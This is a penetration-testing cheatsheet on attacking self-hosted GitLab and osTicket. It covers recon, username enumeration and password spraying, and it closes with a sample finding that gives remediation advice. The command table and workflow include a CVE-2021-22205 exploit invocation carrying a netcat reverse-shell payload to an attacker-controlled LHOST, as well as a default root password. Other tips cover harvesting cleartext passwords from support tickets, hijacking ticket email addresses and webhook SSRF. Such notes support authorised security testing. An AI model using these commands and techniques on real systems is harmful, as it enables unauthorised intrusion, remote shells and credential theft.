π‘οΈ Methodology Checklist
- GitLab: check version at
/helpor HTTP headers - CVE-2021-22205: unauthenticated RCE via image upload (pre-13.10.3)
- GitLab registration: self-register if open, explore internal repos
- Search repos for secrets: API keys, credentials, internal URLs
- osTicket: default admin interface at
/scp/ - osTicket CVEs for version-specific RCE
- Test file attachment upload for webshell
π― Operational Context
Use when: GitLab or osTicket identified β enumerate repositories for secrets, exploit authentication bypasses, or leverage known CVEs.
Think Dumber First: GitLab self-hosted: check /explore for public repos without authentication. Search repo contents for API keys, .env files, hardcoded passwords. osTicket: check for CVE-2020-24881 or default admin creds.
Skip when: GitLab is cloud-hosted (gitlab.com) β attack surface limited; focus on credential stuffing instead.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
curl -i http://[TARGET_IP]:[PORT]/explore | GitLab: unauthenticated public project recon |
curl -i http://[TARGET_IP]:[PORT]/users/sign_up | GitLab: username enumeration via βUsername is already takenβ error |
./gitlab_userenum.sh --url http://[TARGET_IP]:[PORT]/ --userlist [WORDLIST] | GitLab automated user enumeration |
python3 gitlab_13_10_2_rce.py -t http://[TARGET_IP]:[PORT] -u [USER] -p [PASS] -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc [LHOST] [LPORT] >/tmp/f' | GitLab CE < 13.10.2 ExifTool RCE (CVE-2021-22205) |
python3 dehashed.py -q [TARGET_DOMAIN] -p | Search breach databases for leaked credentials |
cat subdomains.txt | httpx -sc -title -o alive_hosts.txt | Fast probe subdomains for live web apps (osTicket discovery) |
eyewitness -f alive_hosts.txt --web | Screenshot alive hosts for visual inspection |
π¬ Deep Dive & Workflow
GitLab Attack Flow
1. Check /explore (unauthenticated) β public projects + snippets
/explore/snippets β often missed, has hardcoded secrets
2. Check /users/sign_up β username enumeration
"Username is already taken" = valid user
Common targets: root, admin, developer, [employee names]
3. If self-registration enabled β register account β access Internal projects
4. Enumerate all repos:
- Check commit history (Initial Commit = 90% of secrets)
- Check dev/staging/test branches
- Hunt: .env, config.php, id_rsa, .gitlab-ci.yml, setup.sh
5. CVE-2021-22205 (GitLab CE β€ 13.10.2):
- ExifTool arbitrary code exec via uploaded image metadata
- Requires authentication (use self-registered account if self-reg enabled)
- python3 gitlab_13_10_2_rce.py -t http://[TARGET] -u [USER] -p [PASS] -c '[SHELL]'
Default creds: root:5iveL!fe (older installs). Version at /help (authenticated only).
Brute-force lockout: 10 attempts β 10-minute lockout. Spray slowly.
Stabilize shell after RCE:
python3 -c 'import pty; pty.spawn("/bin/bash")'osTicket Attack Flow
Discovery:
- OSTSESSID cookie or "Powered by osTicket" in footer
- httpx probe β eyewitness screenshot β identify portal
Agent panel: /scp/login.php
Open ticket: http://[TARGET]/open.php
Attack vectors:
1. OSINT/breach creds β dehashed.py β spray against /scp/login.php
2. Closed tickets β search for "password", "VPN", "reset", "standard"
β IT often sends cleartext passwords in ticket replies
3. Email hijacking:
- Open new ticket β observe assigned ticket email (e.g., 940288@company.local)
- Use this email to register on internal services (GitLab, Mattermost, etc.)
- Receive confirmation email in osTicket dashboard
4. Export address book β valid usernames for password spraying
CVE-2020-24881: osTicket 1.14.1 SSRF β pivot into internal network.
Key insight: osTicket is primarily a pivot tool, not a direct RCE target. Use it to:
- Harvest cleartext passwords from tickets
- Generate internal email addresses
- Build valid username lists
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| GitLab explore page blocked | Signup/explore restricted | Try direct project URL: http://[TARGET]/[GROUP]/[REPO]; some repos public even if explore blocked |
| GitLab API requires auth | No guest access | Try: GET /api/v4/projects β public projects listed without auth if configured |
| Git clone fails with auth | Repo private | Check for .git in web dir: http://[TARGET]/.git/config β some deployments expose .git folder |
| osTicket staff login location | Non-default URL | Try: /scp/login.php, /support/scp/login.php, /helpdesk/scp/ |
| GitLab SSRF via Webhooks | Need project creation rights | Create project β Settings β Integrations β Webhook URL = internal address β trigger via push |
π Reporting Trigger
Finding Title: GitLab Instance Exposes Sensitive Repositories or Credentials Impact: Publicly accessible GitLab repositories containing API keys, database credentials, private keys, or internal architecture documentation provide attackers with direct credential access and infrastructure knowledge without any exploitation. Root Cause: Repositories configured as public without content review. No secrets scanning in CI/CD pipeline to prevent credential commits. Recommendation: Audit all GitLab repositories for sensitive content. Implement pre-commit hooks to block credential commits. Enable GitLab Secret Detection. Enforce private-by-default for all repositories. Rotate any exposed credentials immediately.